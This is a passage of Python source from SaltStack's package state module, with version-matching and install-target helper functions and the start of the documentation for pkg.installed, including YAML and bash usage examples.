- pkgs:
- php5-fpm
- php5-cli
- php5-curl
.. warning::
Package names are currently case-sensitive. If the minion is using a
package manager which is not case-sensitive (such as :mod:`pkgng
<salt.modules.pkgng>`), then this state will fail if the proper case is not
used. This will be addressed in a future release of Salt.
"""
import fnmatch
import logging
import os
import re
import salt.utils.pkg
import salt.utils.platform
import salt.utils.versions
from salt.exceptions import CommandExecutionError, MinionError, SaltInvocationError
from salt.modules.pkg_resource import _repack_pkgs
from salt.output import nested
from salt.utils.functools import namespaced_function as _namespaced_function
from salt.utils.odict import OrderedDict as _OrderedDict
# pylint: disable=invalid-name
_repack_pkgs = _namespaced_function(_repack_pkgs, globals())
if salt.utils.platform.is_windows():
# pylint: disable=import-error,no-name-in-module,unused-import
from urllib.parse import urlparse as _urlparse
from salt.exceptions import SaltRenderError
import collections
import datetime
import errno
import time
from functools import cmp_to_key
# pylint: disable=import-error
# pylint: enable=unused-import
from salt.modules.win_pkg import _get_package_info
from salt.modules.win_pkg import get_repo_data
from salt.modules.win_pkg import _get_repo_details
from salt.modules.win_pkg import _refresh_db_conditional
from salt.modules.win_pkg import refresh_db
from salt.modules.win_pkg import genrepo
from salt.modules.win_pkg import _repo_process_pkg_sls
from salt.modules.win_pkg import _get_latest_pkg_version
from salt.modules.win_pkg import _reverse_cmp_pkg_versions
_get_package_info = _namespaced_function(_get_package_info, globals())
get_repo_data = _namespaced_function(get_repo_data, globals())
_get_repo_details = _namespaced_function(_get_repo_details, globals())
_refresh_db_conditional = _namespaced_function(_refresh_db_conditional, globals())
refresh_db = _namespaced_function(refresh_db, globals())
genrepo = _namespaced_function(genrepo, globals())
_repo_process_pkg_sls = _namespaced_function(_repo_process_pkg_sls, globals())
_get_latest_pkg_version = _namespaced_function(_get_latest_pkg_version, globals())
_reverse_cmp_pkg_versions = _namespaced_function(
_reverse_cmp_pkg_versions, globals()
)
# The following imports are used by the namespaced win_pkg funcs
# and need to be included in their globals.
# pylint: disable=import-error,unused-import
import salt.utils.msgpack as msgpack
from salt.utils.versions import LooseVersion
# pylint: enable=import-error,unused-import
# pylint: enable=invalid-name
log = logging.getLogger(__name__)
def __virtual__():
"""
Only make these states available if a pkg provider has been detected or
assigned for this minion
"""
if "pkg.install" in __salt__:
return True
return (False, "pkg module could not be loaded")
def _get_comparison_spec(pkgver):
"""
Return a tuple containing the comparison operator and the version. If no
comparison operator was passed, the comparison is assumed to be an "equals"
comparison, and "==" will be the operator returned.
"""
oper, verstr = salt.utils.pkg.split_comparison(pkgver.strip())
if oper in ("=", ""):
oper = "=="
return oper, verstr
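# Illustrative behavior of the helper above (hypothetical inputs, shown only as
# comments; the actual splitting is delegated to salt.utils.pkg.split_comparison):
#   _get_comparison_spec(">=1.2.3") -> (">=", "1.2.3")
#   _get_comparison_spec("1.2.3")   -> ("==", "1.2.3")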
def _check_ignore_epoch(oper, desired_version, ignore_epoch=None):
"""
Conditionally ignore epoch, but only under all of the following
circumstances:
1. No value for ignore_epoch passed to state
2. desired_version has no epoch
3. oper does not contain a "<" or ">"
"""
if ignore_epoch is not None:
return ignore_epoch
return "<" not in oper and ">" not in oper and ":" not in desired_version
def _parse_version_string(version_conditions_string):
"""
Returns a list of two-tuples containing (operator, version).
"""
result = []
version_conditions_string = version_conditions_string.strip()
if not version_conditions_string:
return result
for version_condition in version_conditions_string.split(","):
operator_and_version = _get_comparison_spec(version_condition)
result.append(operator_and_version)
return result
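# Illustrative example (hypothetical condition string): "> 1.0, != 2.0" would be
# parsed into [(">", "1.0"), ("!=", "2.0")] by the comparison-spec helper above.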
def _fulfills_version_string(
installed_versions,
version_conditions_string,
ignore_epoch=None,
allow_updates=False,
):
"""
Returns True if any of the installed versions match the specified version conditions,
otherwise returns False.
installed_versions
The installed versions
version_conditions_string
The string containing all version conditions. E.G.
1.2.3-4
>=1.2.3-4
>=1.2.3-4, <2.3.4-5
>=1.2.3-4, <2.3.4-5, !=1.2.4-1
ignore_epoch : None
        When a package version contains a non-zero epoch (e.g.
``1:3.14.159-2.el7``), and a specific version of a package is desired,
set this option to ``True`` to ignore the epoch when comparing
versions.
.. versionchanged:: 3001
If no value for this argument is passed to the state that calls
this helper function, and ``version_conditions_string`` contains no
epoch or greater-than/less-than, then the epoch will be ignored.
allow_updates : False
Allow the package to be updated outside Salt's control (e.g. auto updates on Windows).
This means a package on the Minion can have a newer version than the latest available in
the repository without enforcing a re-installation of the package.
(Only applicable if only one strict version condition is specified E.G. version: 2.0.6~ubuntu3)
"""
version_conditions = _parse_version_string(version_conditions_string)
for installed_version in installed_versions:
fullfills_all = True
for operator, version_string in version_conditions:
if allow_updates and len(version_conditions) == 1 and operator == "==":
operator = ">="
fullfills_all = fullfills_all and _fulfills_version_spec(
[installed_version], operator, version_string, ignore_epoch=ignore_epoch
)
if fullfills_all:
return True
return False
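# Illustrative example (hypothetical versions): installed_versions=["1.2.5-4"] with
# version_conditions_string=">=1.2.3-4, <2.3.4-5" satisfies both conditions, so the
# function would return True (subject to the pkg.version_cmp semantics used below).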
def _fulfills_version_spec(versions, oper, desired_version, ignore_epoch=None):
"""
Returns True if any of the installed versions match the specified version,
otherwise returns False
"""
cmp_func = __salt__.get("pkg.version_cmp")
# stripping "with_origin" dict wrapper
if salt.utils.platform.is_freebsd():
if isinstance(versions, dict) and "version" in versions:
versions = versions["version"]
for ver in versions:
if (
oper == "==" and fnmatch.fnmatch(ver, desired_version)
) or salt.utils.versions.compare(
ver1=ver,
oper=oper,
ver2=desired_version,
cmp_func=cmp_func,
ignore_epoch=_check_ignore_epoch(oper, desired_version, ignore_epoch),
):
return True
return False
def _find_unpurge_targets(desired, **kwargs):
"""
Find packages which are marked to be purged but can't yet be removed
because they are dependencies for other installed packages. These are the
packages which will need to be 'unpurged' because they are part of
pkg.installed states. This really just applies to Debian-based Linuxes.
"""
return [
x
for x in desired
if x in __salt__["pkg.list_pkgs"](purge_desired=True, **kwargs)
]
def _find_download_targets(
name=None,
version=None,
pkgs=None,
normalize=True,
skip_suggestions=False,
ignore_epoch=None,
**kwargs
):
"""
Inspect the arguments to pkg.downloaded and discover what packages need to
be downloaded. Return a dict of packages to download.
"""
cur_pkgs = __salt__["pkg.list_downloaded"](**kwargs)
if pkgs:
# pylint: disable=not-callable
to_download = _repack_pkgs(pkgs, normalize=normalize)
# pylint: enable=not-callable
if not to_download:
# Badly-formatted SLS
return {
"name": name,
"changes": {},
"result": False,
"comment": "Invalidly formatted pkgs parameter. See minion log.",
}
else:
if normalize:
_normalize_name = __salt__.get(
"pkg.normalize_name", lambda pkgname: pkgname
)
to_download = {_normalize_name(name): version}
else:
to_download = {name: version}
cver = cur_pkgs.get(name, {})
if name in to_download:
# Package already downloaded, no need to download again
if cver and version in cver:
return {
"name": name,
"changes": {},
"result": True,
"comment": (
"Version {} of package '{}' is already downloaded".format(
version, name
)
),
}
# if cver is not an empty string, the package is already downloaded
elif cver and version is None:
# The package is downloaded
return {
"name": name,
"changes": {},
"result": True,
"comment": "Package {} is already downloaded".format(name),
}
version_spec = False
if not skip_suggestions:
try:
problems = _preflight_check(to_download, **kwargs)
except CommandExecutionError:
pass
else:
comments = []
if problems.get("no_suggest"):
comments.append(
"The following package(s) were not found, and no "
"possible matches were found in the package db: "
"{}".format(", ".join(sorted(problems["no_suggest"])))
)
if problems.get("suggest"):
for pkgname, suggestions in problems["suggest"].items():
comments.append(
"Package '{}' not found (possible matches: {})".format(
pkgname, ", ".join(suggestions)
)
)
if comments:
if len(comments) > 1:
comments.append("")
return {
"name": name,
"changes": {},
"result": False,
"comment": ". ".join(comments).rstrip(),
}
# Find out which packages will be targeted in the call to pkg.download
# Check current downloaded versions against specified versions
targets = {}
problems = []
for pkgname, pkgver in to_download.items():
cver = cur_pkgs.get(pkgname, {})
# Package not yet downloaded, so add to targets
if not cver:
targets[pkgname] = pkgver
continue
# No version specified but package is already downloaded
elif cver and not pkgver:
continue
version_spec = True
try:
if not _fulfills_version_string(
cver.keys(), pkgver, ignore_epoch=ignore_epoch
):
targets[pkgname] = pkgver
except CommandExecutionError as exc:
problems.append(exc.strerror)
continue
if problems:
return {
"name": name,
"changes": {},
"result": False,
"comment": " ".join(problems),
}
if not targets:
# All specified packages are already downloaded
msg = "All specified packages{} are already downloaded".format(
" (matching specified versions)" if version_spec else ""
)
return {"name": name, "changes": {}, "result": True, "comment": msg}
return targets
def _find_advisory_targets(name=None, advisory_ids=None, **kwargs):
"""
Inspect the arguments to pkg.patch_installed and discover what advisory
patches need to be installed. Return a dict of advisory patches to install.
"""
cur_patches = __salt__["pkg.list_installed_patches"](**kwargs)
if advisory_ids:
to_download = advisory_ids
else:
to_download = [name]
if cur_patches.get(name, {}):
# Advisory patch already installed, no need to install it again
return {
"name": name,
"changes": {},
"result": True,
"comment": "Advisory patch {} is already installed".format(name),
}
# Find out which advisory patches will be targeted in the call to pkg.install
targets = []
for patch_name in to_download:
cver = cur_patches.get(patch_name, {})
# Advisory patch not yet installed, so add to targets
if not cver:
targets.append(patch_name)
continue
if not targets:
# All specified advisory patches are already installed
msg = "All specified advisory patches are already installed"
return {"name": name, "changes": {}, "result": True, "comment": msg}
return targets
def _find_remove_targets(
name=None, version=None, pkgs=None, normalize=True, ignore_epoch=None, **kwargs
):
"""
Inspect the arguments to pkg.removed and discover what packages need to
be removed. Return a dict of packages to remove.
"""
if __grains__["os"] == "FreeBSD":
kwargs["with_origin"] = True
cur_pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True, **kwargs)
if pkgs:
# pylint: disable=not-callable
to_remove = _repack_pkgs(pkgs, normalize=normalize)
# pylint: enable=not-callable
if not to_remove:
# Badly-formatted SLS
return {
"name": name,
"changes": {},
"result": False,
"comment": "Invalidly formatted pkgs parameter. See minion log.",
}
else:
_normalize_name = __salt__.get("pkg.normalize_name", lambda pkgname: pkgname)
to_remove = {_normalize_name(name): version}
version_spec = False
# Find out which packages will be targeted in the call to pkg.remove
# Check current versions against specified versions
targets = []
problems = []
for pkgname, pkgver in to_remove.items():
# FreeBSD pkg supports `openjdk` and `java/openjdk7` package names
origin = bool(re.search("/", pkgname))
if __grains__["os"] == "FreeBSD" and origin:
cver = [k for k, v in cur_pkgs.items() if v["origin"] == pkgname]
else:
cver = cur_pkgs.get(pkgname, [])
# Package not installed, no need to remove
if not cver:
continue
# No version specified and pkg is installed
elif __salt__["pkg_resource.version_clean"](pkgver) is None:
targets.append(pkgname)
continue
version_spec = True
try:
if _fulfills_version_string(cver, pkgver, ignore_epoch=ignore_epoch):
targets.append(pkgname)
else:
log.debug(
"Current version (%s) did not match desired version "
"specification (%s), will not remove",
cver,
pkgver,
)
except CommandExecutionError as exc:
problems.append(exc.strerror)
continue
if problems:
return {
"name": name,
"changes": {},
"result": False,
"comment": " ".join(problems),
}
if not targets:
# All specified packages are already absent
msg = "All specified packages{} are already absent".format(
" (matching specified versions)" if version_spec else ""
)
return {"name": name, "changes": {}, "result": True, "comment": msg}
return targets
def _find_install_targets(
name=None,
version=None,
pkgs=None,
sources=None,
skip_suggestions=False,
pkg_verify=False,
normalize=True,
ignore_epoch=None,
reinstall=False,
refresh=False,
**kwargs
):
"""
Inspect the arguments to pkg.installed and discover what packages need to
be installed. Return a dict of desired packages
"""
was_refreshed = False
if all((pkgs, sources)):
return {
"name": name,
"changes": {},
"result": False,
"comment": 'Only one of "pkgs" and "sources" is permitted.',
}
# dict for packages that fail pkg.verify and their altered files
altered_files = {}
# Get the ignore_types list if any from the pkg_verify argument
if isinstance(pkg_verify, list) and any(
x.get("ignore_types") is not None
for x in pkg_verify
if isinstance(x, _OrderedDict) and "ignore_types" in x
):
ignore_types = next(
x.get("ignore_types") for x in pkg_verify if "ignore_types" in x
)
else:
ignore_types = []
# Get the verify_options list if any from the pkg_verify argument
if isinstance(pkg_verify, list) and any(
x.get("verify_options") is not None
for x in pkg_verify
if isinstance(x, _OrderedDict) and "verify_options" in x
):
verify_options = next(
x.get("verify_options") for x in pkg_verify if "verify_options" in x
)
else:
verify_options = []
if __grains__["os"] == "FreeBSD":
kwargs["with_origin"] = True
if salt.utils.platform.is_windows():
# Windows requires a refresh to establish a pkg db if refresh=True, so
# add it to the kwargs.
kwargs["refresh"] = refresh
resolve_capabilities = (
kwargs.get("resolve_capabilities", False) and "pkg.list_provides" in __salt__
)
try:
cur_pkgs = __salt__["pkg.list_pkgs"](versions_as_list=True, **kwargs)
cur_prov = (
resolve_capabilities and __salt__["pkg.list_provides"](**kwargs) or dict()
)
except CommandExecutionError as exc:
return {"name": name, "changes": {}, "result": False, "comment": exc.strerror}
if salt.utils.platform.is_windows() and kwargs.pop("refresh", False):
# We already refreshed when we called pkg.list_pkgs
was_refreshed = True
refresh = False
if any((pkgs, sources)):
if pkgs:
# pylint: disable=not-callable
desired = _repack_pkgs(pkgs, normalize=normalize)
# pylint: enable=not-callable
elif sources:
desired = __salt__["pkg_resource.pack_sources"](
sources,
normalize=normalize,
)
if not desired:
# Badly-formatted SLS
return {
"name": name,
"changes": {},
"result": False,
"comment": "Invalidly formatted '{}' parameter. See minion log.".format(
"pkgs" if pkgs else "sources"
),
}
to_unpurge = _find_unpurge_targets(desired, **kwargs)
else:
if salt.utils.platform.is_windows():
# pylint: disable=not-callable
pkginfo = _get_package_info(name, saltenv=kwargs["saltenv"])
# pylint: enable=not-callable
if not pkginfo:
return {
"name": name,
"changes": {},
"result": False,
"comment": "Package {} not found in the repository.".format(name),
}
if version is None:
# pylint: disable=not-callable
version = _get_latest_pkg_version(pkginfo)
# pylint: enable=not-callable
if normalize:
_normalize_name = __salt__.get(
"pkg.normalize_name", lambda pkgname: pkgname
)
desired = {_normalize_name(name): version}
else:
desired = {name: version}
to_unpurge = _find_unpurge_targets(desired, **kwargs)
# FreeBSD pkg supports `openjdk` and `java/openjdk7` package names
origin = bool(re.search("/", name))
if __grains__["os"] == "FreeBSD" and origin:
cver = [k for k, v in cur_pkgs.items() if v["origin"] == name]
else:
cver = cur_pkgs.get(name, [])
if name not in to_unpurge:
if version and version in cver and not reinstall and not pkg_verify:
# The package is installed and is the correct version
return {
"name": name,
"changes": {},
"result": True,
"comment": "Version {} of package '{}' is already installed".format(
version, name
),
}
# if cver is not an empty string, the package is already installed
elif cver and version is None and not reinstall and not pkg_verify:
# The package is installed
return {
"name": name,
"changes": {},
"result": True,
"comment": "Package {} is already installed".format(name),
}
version_spec = False
if not sources:
# Check for alternate package names if strict processing is not
# enforced. Takes extra time. Disable for improved performance
if not skip_suggestions:
# Perform platform-specific pre-flight checks
not_installed = {
name: version
for name, version in desired.items()
if not (
name in cur_pkgs
and (
version is None
or _fulfills_version_string(
cur_pkgs[name], version, ignore_epoch=ignore_epoch
)
)
)
}
if not_installed:
try:
problems = _preflight_check(not_installed, **kwargs)
except CommandExecutionError:
pass
else:
comments = []
if problems.get("no_suggest"):
comments.append(
"The following package(s) were not found, and no "
"possible matches were found in the package db: "
"{}".format(", ".join(sorted(problems["no_suggest"])))
)
if problems.get("suggest"):
for pkgname, suggestions in problems["suggest"].items():
comments.append(
"Package '{}' not found (possible matches: {})".format(
pkgname, ", ".join(suggestions)
)
)
if comments:
if len(comments) > 1:
comments.append("")
return {
"name": name,
"changes": {},
"result": False,
"comment": ". ".join(comments).rstrip(),
}
# Resolve the latest package version for any packages with "latest" in the
# package version
wants_latest = [] if sources else [x for x, y in desired.items() if y == "latest"]
if wants_latest:
resolved_latest = __salt__["pkg.latest_version"](
*wants_latest, refresh=refresh, **kwargs
)
if len(wants_latest) == 1:
resolved_latest = {wants_latest[0]: resolved_latest}
if refresh:
was_refreshed = True
refresh = False
# pkg.latest_version returns an empty string when the package is
# up-to-date. So check the currently-installed packages. If found, the
# resolved latest version will be the currently installed one from
# cur_pkgs. If not found, then the package doesn't exist and the
# resolved latest version will be None.
for key in resolved_latest:
if not resolved_latest[key]:
if key in cur_pkgs:
resolved_latest[key] = cur_pkgs[key][-1]
else:
resolved_latest[key] = None
# Update the desired versions with the ones we resolved
desired.update(resolved_latest)
# Find out which packages will be targeted in the call to pkg.install
targets = {}
to_reinstall = {}
problems = []
warnings = []
failed_verify = False
for package_name, version_string in desired.items():
cver = cur_pkgs.get(package_name, [])
if resolve_capabilities and not cver and package_name in cur_prov:
cver = cur_pkgs.get(cur_prov.get(package_name)[0], [])
# Package not yet installed, so add to targets
if not cver:
targets[package_name] = version_string
continue
if sources:
if reinstall:
to_reinstall[package_name] = version_string
continue
elif "lowpkg.bin_pkg_info" not in __salt__:
continue
# Metadata parser is available, cache the file and derive the
# package's name and version
err = "Unable to cache {0}: {1}"
try:
cached_path = __salt__["cp.cache_file"](
version_string, saltenv=kwargs["saltenv"]
)
except CommandExecutionError as exc:
problems.append(err.format(version_string, exc))
continue
if not cached_path:
problems.append(err.format(version_string, "file not found"))
continue
elif not os.path.exists(cached_path):
problems.append("{} does not exist on minion".format(version_string))
continue
source_info = __salt__["lowpkg.bin_pkg_info"](cached_path)
if source_info is None:
warnings.append(
"Failed to parse metadata for {}".format(version_string)
)
continue
else:
verstr = source_info["version"]
else:
verstr = version_string
if reinstall:
to_reinstall[package_name] = version_string
continue
if not __salt__["pkg_resource.check_extra_requirements"](
package_name, version_string
):
targets[package_name] = version_string
continue
# No version specified and pkg is installed
elif __salt__["pkg_resource.version_clean"](version_string) is None:
if (not reinstall) and pkg_verify:
try:
verify_result = __salt__["pkg.verify"](
package_name,
ignore_types=ignore_types,
verify_options=verify_options,
**kwargs
)
except (CommandExecutionError, SaltInvocationError) as exc:
failed_verify = exc.strerror
continue
if verify_result:
to_reinstall[package_name] = version_string
altered_files[package_name] = verify_result
continue
version_fulfilled = False
allow_updates = bool(not sources and kwargs.get("allow_updates"))
try:
version_fulfilled = _fulfills_version_string(
cver, verstr, ignore_epoch=ignore_epoch, allow_updates=allow_updates
)
except CommandExecutionError as exc:
problems.append(exc.strerror)
continue
# Compare desired version against installed version.
version_spec = True
if not version_fulfilled:
if reinstall:
to_reinstall[package_name] = version_string
else:
version_conditions = _parse_version_string(version_string)
if pkg_verify and any(
oper == "==" for oper, version in version_conditions
):
try:
verify_result = __salt__["pkg.verify"](
package_name,
ignore_types=ignore_types,
verify_options=verify_options,
**kwargs
)
except (CommandExecutionError, SaltInvocationError) as exc:
failed_verify = exc.strerror
continue
if verify_result:
to_reinstall[package_name] = version_string
altered_files[package_name] = verify_result
else:
log.debug(
"Current version (%s) did not match desired version "
"specification (%s), adding to installation targets",
cver,
version_string,
)
targets[package_name] = version_string
if failed_verify:
problems.append(failed_verify)
if problems:
return {
"name": name,
"changes": {},
"result": False,
"comment": " ".join(problems),
}
if not any((targets, to_unpurge, to_reinstall)):
# All specified packages are installed
msg = "All specified packages are already installed{0}"
msg = msg.format(
" and are at the desired version" if version_spec and not sources else ""
)
ret = {"name": name, "changes": {}, "result": True, "comment": msg}
if warnings:
ret.setdefault("warnings", []).extend(warnings)
return ret
return (
desired,
targets,
to_unpurge,
to_reinstall,
altered_files,
warnings,
was_refreshed,
)
def _verify_install(desired, new_pkgs, ignore_epoch=None, new_caps=None):
"""
Determine whether or not the installed packages match what was requested in
the SLS file.
"""
_ok = []
failed = []
if not new_caps:
new_caps = dict()
for pkgname, pkgver in desired.items():
# FreeBSD pkg supports `openjdk` and `java/openjdk7` package names.
# Homebrew for Mac OSX does something similar with tap names
# prefixing package names, separated with a slash.
has_origin = "/" in pkgname
if __grains__["os"] == "FreeBSD" and has_origin:
cver = [k for k, v in new_pkgs.items() if v["origin"] == pkgname]
elif __grains__["os"] == "MacOS" and has_origin:
cver = new_pkgs.get(pkgname, new_pkgs.get(pkgname.split("/")[-1]))
elif __grains__["os"] == "OpenBSD":
cver = new_pkgs.get(pkgname.split("%")[0])
elif __grains__["os_family"] == "Debian":
cver = new_pkgs.get(pkgname.split("=")[0])
else:
cver = new_pkgs.get(pkgname)
if not cver and pkgname in new_caps:
cver = new_pkgs.get(new_caps.get(pkgname)[0])
if not cver:
failed.append(pkgname)
continue
elif pkgver == "latest":
_ok.append(pkgname)
continue
elif not __salt__["pkg_resource.version_clean"](pkgver):
_ok.append(pkgname)
continue
elif pkgver.endswith("*") and cver[0].startswith(pkgver[:-1]):
_ok.append(pkgname)
continue
if _fulfills_version_string(cver, pkgver, ignore_epoch=ignore_epoch):
_ok.append(pkgname)
else:
failed.append(pkgname)
return _ok, failed
def _get_desired_pkg(name, desired):
"""
Helper function that retrieves and nicely formats the desired pkg (and
version if specified) so that helpful information can be printed in the
comment for the state.
"""
if not desired[name] or desired[name].startswith(("<", ">", "=")):
oper = ""
else:
oper = "="
return "{}{}{}".format(name, oper, "" if not desired[name] else desired[name])
def _preflight_check(desired, fromrepo, **kwargs):
"""
Perform platform-specific checks on desired packages
"""
if "pkg.check_db" not in __salt__:
return {}
ret = {"suggest": {}, "no_suggest": []}
pkginfo = __salt__["pkg.check_db"](
*list(desired.keys()), fromrepo=fromrepo, **kwargs
)
for pkgname in pkginfo:
if pkginfo[pkgname]["found"] is False:
if pkginfo[pkgname]["suggestions"]:
ret["suggest"][pkgname] = pkginfo[pkgname]["suggestions"]
else:
ret["no_suggest"].append(pkgname)
return ret
def _nested_output(obj):
"""
Serialize obj and format for output
"""
nested.__opts__ = __opts__
ret = nested.output(obj).rstrip()
return ret
def _resolve_capabilities(pkgs, refresh=False, **kwargs):
"""
Resolve capabilities in ``pkgs`` and exchange them with real package
names, when the resolution is unambiguous.
This feature can be turned on by setting the parameter
``resolve_capabilities`` to True.
Return the input dictionary with capability names replaced by real
package names and, as a second return value, a bool indicating whether
a refresh still needs to be run.
If ``resolve_capabilities`` is False (disabled) or not supported by the
implementation, the input is returned unchanged.
"""
if not pkgs or "pkg.resolve_capabilities" not in __salt__:
return pkgs, refresh
ret = __salt__["pkg.resolve_capabilities"](pkgs, refresh=refresh, **kwargs)
return ret, False
def installed(
name,
version=None,
refresh=None,
fromrepo=None,
skip_verify=False,
skip_suggestions=False,
pkgs=None,
sources=None,
allow_updates=False,
pkg_verify=False,
normalize=True,
ignore_epoch=None,
reinstall=False,
update_holds=False,
**kwargs
):
"""
Ensure that the package is installed, and that it is the correct version
(if specified).
.. note::
Any argument which is either a) not explicitly defined for this state,
or b) not a global state argument like ``saltenv``, or
``reload_modules``, will be passed through to the call to
``pkg.install`` to install the package(s). For example, you can include
a ``disablerepo`` argument on platforms that use yum/dnf to disable
that repo:
.. code-block:: yaml
mypkg:
pkg.installed:
- disablerepo: base,updates
To see what is supported, check :ref:`this page <virtual-pkg>` to find
the documentation for your platform's ``pkg`` module, then look at the
documentation for the ``install`` function.
Any argument that is passed through to the ``install`` function, which
is not defined for that function, will be silently ignored.
:param str name:
The name of the package to be installed. This parameter is ignored if
either "pkgs" or "sources" is used. Additionally, please note that this
option can only be used to install packages from a software repository.
To install a package file manually, use the "sources" option detailed
below.
:param str version:
Install a specific version of a package. This option is ignored if
"sources" is used. Currently, this option is supported
for the following pkg providers: :mod:`apt <salt.modules.aptpkg>`,
:mod:`ebuild <salt.modules.ebuild>`,
:mod:`pacman <salt.modules.pacman>`,
:mod:`pkgin <salt.modules.pkgin>`,
:mod:`win_pkg <salt.modules.win_pkg>`,
:mod:`yumpkg <salt.modules.yumpkg>`, and
:mod:`zypper <salt.modules.zypper>`. The version number includes the
release designation where applicable, to allow Salt to target a
specific release of a given version. When in doubt, using the
``pkg.latest_version`` function for an uninstalled package will tell
you the version available.
.. code-block:: bash
# salt myminion pkg.latest_version vim-enhanced
myminion:
2:7.4.160-1.el7
.. important::
As of version 2015.8.7, for distros which use yum/dnf, packages
which have a version with a nonzero epoch (that is, versions which
start with a number followed by a colon like in the
``pkg.latest_version`` output above) must have the epoch included
when specifying the version number. For example:
.. code-block:: yaml
vim-enhanced:
pkg.installed:
- version: 2:7.4.160-1.el7
In version 2015.8.9, an **ignore_epoch** argument has been added to
:py:mod:`pkg.installed <salt.states.pkg.installed>`,
:py:mod:`pkg.removed <salt.states.pkg.removed>`, and
:py:mod:`pkg.purged <salt.states.pkg.purged>` states, which
causes the epoch to be disregarded when the state checks to see if
the desired version was installed.
Also, while this function is not yet implemented for all pkg frontends,
:mod:`pkg.list_repo_pkgs <salt.modules.yumpkg.list_repo_pkgs>` will
show all versions available in the various repositories for a given
package, irrespective of whether or not it is installed.
.. code-block:: bash
# salt myminion pkg.list_repo_pkgs bash
myminion:
----------
bash:
- 4.2.46-21.el7_3
- 4.2.46-20.el7_2
This function was first added for :mod:`pkg.list_repo_pkgs
<salt.modules.yumpkg.list_repo_pkgs>` in 2014.1.0, and was expanded to
:py:func:`Debian/Ubuntu <salt.modules.aptpkg.list_repo_pkgs>` and
:py:func:`Arch Linux <salt.modules.pacman.list_repo_pkgs>`-based
distros in the 2017.7.0 release.
The version strings returned by either of these functions can be used
as version specifiers in pkg states.
You can install a specific version when using the ``pkgs`` argument by
including the version after the package:
.. code-block:: yaml
common_packages:
pkg.installed:
- pkgs:
- unzip
- dos2unix
- salt-minion: 2015.8.5-1.el6
If the version given is the string ``latest``, the latest available
package version will be installed à la ``pkg.latest``.
**WILDCARD VERSIONS**
As of the 2017.7.0 release, this state now supports wildcards in
package versions for SUSE SLES/Leap/Tumbleweed, Debian/Ubuntu,
RHEL/CentOS, Arch Linux, and their derivatives. Using wildcards can be
useful for packages where the release name is built into the version in
some way, such as for RHEL/CentOS which typically has version numbers
like ``1.2.34-5.el7``. An example of the usage for this would be:
.. code-block:: yaml
mypkg:
pkg.installed:
- version: '1.2.34*'
Keep in mind that using wildcard versions will result in a slower state
run since Salt must gather the available versions of the specified
packages and figure out which of them match the specified wildcard
expression.
:param bool refresh:
This parameter controls whether or not the package repo database is
updated prior to installing the requested package(s).
If ``True``, the package database will be refreshed (``apt-get
update`` or equivalent, depending on platform) before installing.
If ``False``, the package database will *not* be refreshed before
installing.
If unset, then Salt treats package database refreshes differently
depending on whether or not a ``pkg`` state has been executed already
during the current Salt run. Once a refresh has been performed in a
``pkg`` state, for the remainder of that Salt run no other refreshes
will be performed for ``pkg`` states which do not explicitly set
``refresh`` to ``True``. This prevents needless additional refreshes
from slowing down the Salt run.
:param str cache_valid_time:
.. versionadded:: 2016.11.0
This parameter sets the value in seconds after which the cache is
marked as invalid, and a cache update is necessary. This overrides
the ``refresh`` parameter's default behavior.
Example:
.. code-block:: yaml
httpd:
pkg.installed:
- fromrepo: mycustomrepo
- skip_verify: True
- skip_suggestions: True
- version: 2.0.6~ubuntu3
- refresh: True
- cache_valid_time: 300
- allow_updates: True
- hold: False
In this case, a refresh will not take place if the last ``apt-get update``
was executed on the system within the past 5 minutes (300 seconds).
.. note::
This parameter is available only on Debian based distributions and
has no effect on the rest.
:param str fromrepo:
Specify a repository from which to install
.. note::
Distros which use APT (Debian, Ubuntu, etc.) do not have a concept
of repositories in the same way that YUM-based distros do. When a
source is added, it is assigned to a given release. Consider the
following source configuration:
.. code-block:: text
deb http://ppa.launchpad.net/saltstack/salt/ubuntu precise main
The packages provided by this source would be made available via
the ``precise`` release, therefore ``fromrepo`` would need to be
set to ``precise`` for Salt to install the package from this
source.
Having multiple sources in the same release may result in the
default install candidate being newer than what is desired. If this
is the case, the desired version must be specified using the
``version`` parameter.
If the ``pkgs`` parameter is being used to install multiple
packages in the same state, then instead of using ``version``,
use the method of version specification described in the **Multiple
Package Installation Options** section below.
Running the shell command ``apt-cache policy pkgname`` on a minion
can help elucidate the APT configuration and aid in properly
configuring states:
.. code-block:: bash
root@saltmaster:~# salt ubuntu01 cmd.run 'apt-cache policy ffmpeg'
ubuntu01:
ffmpeg:
Installed: (none)
Candidate: 7:0.10.11-1~precise1
Version table:
7:0.10.11-1~precise1 0
500 http://ppa.launchpad.net/jon-severinsson/ffmpeg/ubuntu/ precise/main amd64 Packages
4:0.8.10-0ubuntu0.12.04.1 0
500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 Packages
500 http://security.ubuntu.com/ubuntu/ precise-security/main amd64 Packages
4:0.8.1-0ubuntu1 0
500 http://us.archive.ubuntu.com/ubuntu/ precise/main amd64 Packages
The release is located directly after the source's URL. The actual
release name is the part before the slash, so to install version
**4:0.8.10-0ubuntu0.12.04.1** either ``precise-updates`` or
``precise-security`` could be used for the ``fromrepo`` value.
:param bool skip_verify:
Skip the GPG verification check for the package to be installed
:param bool skip_suggestions:
Force strict package naming. Disables lookup of package alternatives.
.. versionadded:: 2014.1.1
:param bool resolve_capabilities:
Turn on resolving capabilities. This allows one to use "provides" or alias names for packages.
.. versionadded:: 2018.3.0
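Example (a sketch; ``webserver-cap`` stands for a capability or alias
name that resolves to a real package):
.. code-block:: yaml
    webserver-cap:
      pkg.installed:
        - resolve_capabilities: True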
:param bool allow_updates:
Allow the package to be updated outside Salt's control (e.g. auto
updates on Windows). This means a package on the Minion can have a
newer version than the latest available in the repository without
enforcing a re-installation of the package.
.. versionadded:: 2014.7.0
Example:
.. code-block:: yaml
httpd:
pkg.installed:
- fromrepo: mycustomrepo
- skip_verify: True
- skip_suggestions: True
- version: 2.0.6~ubuntu3
- refresh: True
- allow_updates: True
- hold: False
:param bool pkg_verify:
.. versionadded:: 2014.7.0
For requested packages that are already installed and would not be
targeted for upgrade or downgrade, use pkg.verify to determine if any
of the files installed by the package have been altered. If files have
been altered, the reinstall option of pkg.install is used to force a
reinstall. Types to ignore can be passed to pkg.verify. Additionally,
``verify_options`` can be used to modify further the behavior of
pkg.verify. See examples below. Currently, this option is supported
for the following pkg providers: :mod:`yumpkg <salt.modules.yumpkg>`.
Examples:
.. code-block:: yaml
httpd:
pkg.installed:
- version: 2.2.15-30.el6.centos
- pkg_verify: True
.. code-block:: yaml
mypkgs:
pkg.installed:
- pkgs:
- foo
- bar: 1.2.3-4
- baz
- pkg_verify:
- ignore_types:
- config
- doc
